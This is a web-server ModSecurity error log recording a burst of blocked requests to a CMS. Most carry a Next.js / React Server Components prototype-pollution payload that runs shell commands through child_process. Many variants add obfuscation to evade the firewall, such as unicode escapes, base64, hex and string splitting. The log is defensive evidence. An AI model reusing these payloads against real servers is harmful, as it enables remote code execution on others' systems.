ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:__proto__:then\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22resolved_model\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu006c\\x5cu0075\\x5cu0065\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim(..."] [sever [hostname "cms.dev-unit.com"] [uri "/settings"] [unique_id "adJmz5c83uMXRUE9zvQTRQAAAcs"] [Sun Apr 05 15:42:39.572545 2026] [:error] [pid 13019:tid 13244] [client 172.94.9.253:45976] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:\\x5cu005f\\x5cu005f\\x5cu0070\\x5cu0072\\x5cu006f\\x5cu0074\\x5cu006f\\x5cu005f\\x5cu005f:\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22\\x5cu0072\\x5cu0065\\x5cu0073\\x5cu006f\\x5cu006c\\x5cu0076\\x5cu0065\\x5cu0064\\x5cu005f\\x5cu006d\\x5cu006f\\x5cu0064\\x5cu0065\\x5cu006c\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu0..."] [sever [hostname "cms.dev-unit.com"] [uri "/contact"] [unique_id "adJmz7xQSOrq_iRTM7dqZQAAAQQ"] [Sun Apr 05 15:42:39.607106 2026] [:error] [pid 13019:tid 13264] [client 172.94.9.253:46040] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/post"] [unique_id "adJmz7xQSOrq_iRTM7dqZwAAARg"] [Sun Apr 05 15:42:39.607118 2026] [:error] [pid 13019:tid 13243] [client 172.94.9.253:46010] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var\\x5ctres=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw\\x5ctObject.assign(new\\x5ctError('NEXT_REDIRECT'),{digest:\\x5ct`NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/contact"] [unique_id "adJmz7xQSOrq_iRTM7dqaAAAAQM"] [Sun Apr 05 15:42:39.608286 2026] [:error] [pid 23077:tid 23103] [client 172.94.9.253:46036] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('powershell -c \\x2241*271\\x22').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth"] [unique_id "adJmz5c83uMXRUE9zvQTRgAAAdQ"] [Sun Apr 05 15:42:39.617226 2026] [:error] [pid 23077:tid 23107] [client 172.94.9.253:46044] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var/*bypass*/res=process.mainModule.require(/*waf*/'child_process'/*bypass*/).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_f..."] [sever [hostname "cms.dev-unit.com"] [uri "/settings"] [unique_id "adJmz5c83uMXRUE9zvQTRwAAAdg"] [Sun Apr 05 15:42:39.636426 2026] [:error] [pid 23077:tid 23098] [client 172.94.9.253:46022] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/contact"] [unique_id "adJmz5c83uMXRUE9zvQTSAAAAc8"] [Sun Apr 05 15:42:39.642804 2026] [:error] [pid 23077:tid 23105] [client 172.94.9.253:46070] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var r=process.mainModule.require('child_process').spawnSync('sh',['-c','echo $((41*271))']);var res=r.stdout.toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/settings"] [unique_id "adJmz5c83uMXRUE9zvQTSQAAAdY"] [Sun Apr 05 15:42:39.650092 2026] [:error] [pid 13019:tid 13254] [client 172.94.9.253:46052] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('ZWNobyAkKCg0MSoyNzEpKQ==','base64').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/de"] [unique_id "adJmz7xQSOrq_iRTM7dqaQAAAQ4"] [Sun Apr 05 15:42:39.650481 2026] [:error] [pid 13019:tid 13242] [client 172.94.9.253:46074] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22$K4\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:const..."] [sever [hostname "cms.dev-unit.com"] [uri "/settings"] [unique_id "adJmz7xQSOrq_iRTM7dqagAAAQI"] [Sun Apr 05 15:42:39.652151 2026] [:error] [pid 13019:tid 13245] [client 172.94.9.253:46058] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/contact"] [unique_id "adJmz7xQSOrq_iRTM7dqawAAAQU"] [Sun Apr 05 15:42:39.661369 2026] [:error] [pid 31198:tid 31268] [client 172.94.9.253:46078] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:0 outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms.dev-unit.com"] [uri "/user"] [unique_id "adJmzzT5TgrBR8xRnfXBCQAAAVA"] [Sun Apr 05 15:42:39.683913 2026] [:error] [pid 23077:tid 23089] [client 172.94.9.253:46090] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('chi' 'ld_' 'pro' 'cess').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/user"] [unique_id "adJmz5c83uMXRUE9zvQTSgAAAcY"] [Sun Apr 05 15:42:39.683951 2026] [:error] [pid 13019:tid 13258] [client 172.94.9.253:46112] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('6563686f2024282834312a3237312929','hex').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/user"] [unique_id "adJmz7xQSOrq_iRTM7dqbAAAARI"] [Sun Apr 05 15:42:39.718831 2026] [:error] [pid 13019:tid 13246] [client 172.94.9.253:46102] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('powershell -c \\x2241*271\\x22').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/settings"] [unique_id "adJmz7xQSOrq_iRTM7dqbQAAAQY"] [Sun Apr 05 15:42:39.747175 2026] [:error] [pid 13019:tid 13262] [client 172.94.9.253:46110] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:0 outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms.dev-unit.com"] [uri "/post"] [unique_id "adJmz7xQSOrq_iRTM7dqbgAAARY"] [Sun Apr 05 15:42:39.751776 2026] [:error] [pid 23077:tid 23102] [client 172.94.9.253:46134] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/user"] [unique_id "adJmz5c83uMXRUE9zvQTSwAAAdM"] [Sun Apr 05 15:42:39.759335 2026] [:error] [pid 23077:tid 23094] [client 172.94.9.253:46132] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require(['child','_','process'].join('')).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x..."] [sever [hostname "cms.dev-unit.com"] [uri "/user"] [unique_id "adJmz5c83uMXRUE9zvQTTAAAAcs"] [Sun Apr 05 15:42:39.762300 2026] [:error] [pid 23077:tid 23084] [client 172.94.9.253:46120] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:0 outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms.dev-unit.com"] [uri "/contact"] [unique_id "adJmz5c83uMXRUE9zvQTTQAAAcE"] [Sun Apr 05 15:42:39.766768 2026] [:error] [pid 13019:tid 13250] [client 172.94.9.253:46138] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/user"] [unique_id "adJmz7xQSOrq_iRTM7dqcQAAAQo"] [Sun Apr 05 15:42:39.789194 2026] [:error] [pid 13019:tid 13253] [client 172.94.9.253:46144] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:__proto__:then\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22resolved_model\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu006c\\x5cu0075\\x5cu0065\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim(..."] [sever [hostname "cms.dev-unit.com"] [uri "/user"] [unique_id "adJmz7xQSOrq_iRTM7dqcgAAAQ0"] [Sun Apr 05 15:42:39.823503 2026] [:error] [pid 13019:tid 13254] [client 172.94.9.253:46164] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match 